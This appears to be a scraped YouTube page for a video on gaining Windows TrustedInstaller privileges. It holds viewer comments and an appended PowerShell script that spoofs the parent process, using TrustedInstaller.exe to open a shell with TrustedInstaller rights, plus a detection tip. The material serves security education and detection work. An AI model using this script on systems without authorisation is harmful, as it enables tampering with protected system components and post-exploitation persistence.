Hacking Windows TrustedInstaller (GOD MODE)

Published 2024-07-15
jh.live/pwyc || Jump into Pay What You Can training at whatever cost makes sense for you! jh.live/pwyc

James Forshaw's blog post: www.tiraniddo.dev/2017/08/the-art-of-becoming-trus…
Reddit delirium: www.reddit.com/r/Windows10/comments/17m3cyr/how_do…

Learn Cybersecurity - Name Your Price Training with John Hammond: nameyourpricetraining.com/

Learn Coding: jh.live/codecrafters
WATCH MORE:
Dark Web & Cybercrime Investigations:    • Tracking Cybercrime on Telegram  
Malware & Hacker Tradecraft:    • Malware Analysis & Threat Intel: UAC ...  

📧JOIN MY NEWSLETTER ➡ jh.live/email
🙏SUPPORT THE CHANNEL ➡ jh.live/patreon
🤝 SPONSOR THE CHANNEL ➡ jh.live/sponsor
🌎FOLLOW ME EVERYWHERE ➡ jh.live/twitter | jh.live/linkedin | jh.live/discord | jh.live/instagram | jh.live/tiktok
💥 SEND ME MALWARE ➡ jh.live/malware
🔥YOUTUBE ALGORITHM ➡ Like, Comment, & Subs

All Comments (21)
  • @_JohnHammond
    James Forshaw's blog: www.tiraniddo.dev/2017/08/the-art-of-becoming-trus… I love seeing the sentiment for "just run Linux", or "just boot into Safe Mode", or "just attach a recovery USB", etc., but I think in the case of leveraging this for a penetration test, red team engagement, or offensive security work, if it is a remote Windows target (where you can't change the OS or have physical access) you have to live off the land and the constraints of the environment. This process should be valuable when you've got initial access, escalated privileges, and can do further post-exploitation to do damage or set up some sneaky persistence -- you can't as easily make changes, but you can sure as hell run PowerShell code. Just an option and one of many ways to skin a cat :)
  • @dirtnoise0
    I've bricked my vm windows install 3 times this year since I found this channel, excellent video!!
  • @petersmythe6462
    User: "can I uninstall Edge?" Windows: "absolutely not." User: "can I uninstall the Kernel?" Linux: "Let's find out!"
  • @maxmyzer9172
    3:06 what stackoverflow is like now - Q: "How do I do X" A: "Why would you do that? don't do that." (if you're lucky they give an alternative) What it should be: "You can do that by doing this, but this is the better way"
  • @MisterDevel
    Redditors are so aggressive about being wrong that it's quite comical.
  • @itzspiro6047
    Now imagine deleting every single internet application apart from teamviewer and anydesk and calling tech scam call centers.
  • @XeZrunner
    I really dislike how people on Reddit feel entitled to even command others not to do something when it has been made clear that I want to do it, because I know what I'm doing. The same thing often happens with Defender as well. There are perfectly valid reasons to want to disable Defender on a machine and when looking for potential solutions, people quickly shout at you not to do it. It honestly feels like they think it's cool to just defend security at all costs instead of evaluating that disabling security measures is useful in certain scenarios.
  • @EricParker
    Reminds me of how on XP you could actually become System, complete with XP startmenu identifying as system.
  • @giganetom
    Hahaha, this thumbnail aged like fine wine :D
  • Guess what, recently Windows started harassing me with the Win11 update by installing a program called RUXIM, and every time I deleted it Windows just installed it back. So I changed the privilege from SYSTEM to me, and I denied write access for SYSTEM :d
  • @gacekkosmatek
    There is a plugin for Process Hacker which allows you to start any process with TrustedInstaller permissions and even run GUI apps like cmd.
  • @HopliteSecurity
    Whoa, this was a great video with some even better enthusiasm! Thanks for sharing this, I learned several new things and I have some new ideas for setting up security policies around the TrustedInstaller or attempts to abuse it. 🙏🙏🙏🔥🔥🔥
  • I really enjoyed the way you broke this problem down. Add this to the list of follies that is Windows OS. Once Linux is fully able to boot whatever games I want I will fully drop windows. It’s so annoying to have to jump through so many hoops to delete programs from your own PC.
  • @dunngunkadoid
    I barely use that joke of a website but every time I've had to because there was no other option, 99% of my experience from reddit has been almost exactly what you showed in the video. Armchair redditors answering everything besides the question you're asking and in the most condescending way possible. I unironically have more competent conversations with people on /b/ than anywhere I've been forced to go on reddit. Great video btw
  • @byteafterlife
    In other words, removing bloatware with the equivalent of Linux sudo
  • It might also be worthwhile noting that any process run in "Session 0" will always be in a non-GUI context. AFAIK "most" services are run in Session 0, meaning they will never have a GUI to interact with.
  • @roboverholt9959
    I was on the path to be a programmer, but I got kicked out of computer science in high school for getting caught having full access to the HD, bypassing the name/password. I didn't keep up with it. I became a musician for the last 25 years and became really good at that, realizing now, if I would have continued my computer programming path, I'd be smart enough to follow all of this video, but now it's over my head.. lol.. The way he talks as if it's obvious to do this and that.. Shake my head and smile, the world is in the hands of people far smarter than I ... :)
  • @cyberdevil657
    Every single time I watch John Hammond I look at myself and say: I'm a noob in IT even though I was that strange kid that was obsessed over computers out of curiosity. I was the only kid who hacked my school and sold wifi passwords for admin privilege in my first year of high school. I fixed my first laptop (from a friend) with replacement hardware when I was 11, but yet John Hammond reminds me the learning curve in IT is ENDLESS! GOD I LOVE THE ENDLESS LEARNING
  • @NathanOsman
    The reason you're getting the error when setting binpath for the service is because there are certain requirements for executables designed to operate as Windows services, one of which is to respond to queries from the service control manager. Obviously tools that aren't designed this way (like cmd.exe) don't respond and the service control manager thinks "this service is not responding and didn't start correctly." The reason you still see the executable being run is due to a small timeout that the service control manager uses to wait for the service to initialize. The reason you can't see graphical applications like notepad is because services don't run under the local user session and don't have access to the desktop.
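The two threads above (John's "you can sure as hell run PowerShell code" and Nathan's explanation of why pointing a service's binPath at cmd.exe fails with a service-control-manager timeout) both point at the same technique from James Forshaw's linked post: instead of abusing the service binary, start the TrustedInstaller service and spawn your own process with TrustedInstaller.exe as its parent, so the child inherits the service's token. The script below is an added example written for this page, not code from the video or copied from Forshaw's post. It assumes an elevated (administrator) PowerShell session on Windows 10/11, and it uses the NtObjectManager module's Start-Service/Get-NtProcess/New-Win32Process pattern that Forshaw documents; the cmdlet and parameter names are the module's, the whoami check and the Session-ID check at the end are this example's own additions.

```powershell
# Added example: run a command as NT SERVICE\TrustedInstaller by re-parenting
# a new process to the running TrustedInstaller.exe (parent-process spoofing),
# using James Forshaw's NtObjectManager module. Assumes an elevated PowerShell
# session; Install-Module needs PowerShell Gallery access once.

#Requires -RunAsAdministrator
Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'

if (-not (Get-Module -ListAvailable -Name NtObjectManager)) {
    Install-Module -Name NtObjectManager -Scope CurrentUser -Force
}
Import-Module NtObjectManager

# 1. The TrustedInstaller service is normally stopped. Start it so that a
#    TrustedInstaller.exe process (running as SYSTEM, with the service SID
#    NT SERVICE\TrustedInstaller in its token) actually exists to re-parent to.
#    This is the step that does NOT touch the service's binPath, so the SCM
#    timeout described in the comment above never comes into play.
Start-Service -Name TrustedInstaller
$svc = Get-Service -Name TrustedInstaller
if ($svc.Status -ne 'Running') {
    throw "TrustedInstaller service did not start (status: $($svc.Status))"
}

# 2. Open a handle to the service process. Opening a SYSTEM process from an
#    administrator shell relies on SeDebugPrivilege, so enable it explicitly.
Enable-NtTokenPrivilege SeDebugPrivilege
$ti = Get-NtProcess -Name TrustedInstaller.exe

# 3. Create the new process with TrustedInstaller.exe as its parent
#    (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS under the hood). The child inherits
#    the parent's primary token rather than ours. NewConsole gives cmd.exe its
#    own console instead of sharing the (service-owned) parent's.
#    The /k command is a self-check: the group list of the new shell should
#    contain NT SERVICE\TrustedInstaller, which an ordinary admin shell lacks.
$cmd = 'cmd.exe /k whoami /groups | findstr /i "TrustedInstaller"'
$child = New-Win32Process -CommandLine $cmd -CreationFlags NewConsole -ParentProcess $ti

# 4. Caveat from the Session 0 comment: if no window appears, confirm which
#    session the new cmd.exe landed in. SessionId 0 means it is alive but on
#    the non-interactive service desktop, not your desktop.
Get-Process -Name cmd | Select-Object Id, SessionId, StartTime

# Cleanup when finished: close the handle and stop the service again.
# $ti.Close(); Stop-Service -Name TrustedInstaller
```

The well-known service SID that whoami prints for this group is S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464; a file or registry key whose ACL grants only that SID (the usual situation for protected system components) is writable from the spawned shell and nowhere else. From a defensive angle, the observable chain is the same every time: TrustedInstaller service start, followed by a child of TrustedInstaller.exe that is not TiWorker.exe, which is an easy process-tree detection to write.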